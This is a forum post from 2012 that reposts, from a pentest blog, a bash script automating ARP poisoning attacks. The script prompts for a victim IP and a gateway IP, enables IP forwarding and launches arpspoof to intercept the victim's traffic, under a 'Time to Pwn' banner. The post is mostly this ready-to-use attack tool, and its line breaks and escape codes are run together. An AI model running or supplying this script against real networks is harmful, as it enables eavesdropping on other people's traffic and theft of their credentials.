Nytro Posted December 22, 2012 Report Posted December 22, 2012 [h=2]ARP Poisoning Script[/h]The purpose of this script is to automate the process of ARP poison attacks.The attacker must only insert the IP address of the target and the IP of the Gateway.This script was coded by Travis Phillips and you can find the source code below:#!/bin/bashniccard=eth1if [[ $EUID -ne 0 ]]; thenecho -e "\n\t\t\t33[1m 33[31m Script must be run as root! 33[0m \n"echo -e "\t\t\t Example: sudo $0 \n"exit 1elseecho -e "\n33[1;32m#######################################"echo -e "# ARP Poison Script #"echo -e "#######################################"echo -e " 33[1;31mCoded By:33[0m Travis Phillips"echo -e " 33[1;31mDate Released:33[0m 03/27/2012"echo -e " 33[1;31mWebsite:33[0m http://theunl33t.blogspot.com\n33[0m"echo -n "Please enter target's IP: "read victimIPecho -n "Please enter Gateway's IP: "read gatewayIPecho -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"echo -e "\t\t--==[Targets]==--"echo -e "\t\tTarget: $victimIP"echo -e "\t\tGateway: $gatewayIP \n\n"echo -e "[*] Enabling IP Forwarding \n"echo "1" > /proc/sys/net/ipv4/ip_forwardecho -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &fi ARP poison scriptSursa: https://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/ Quote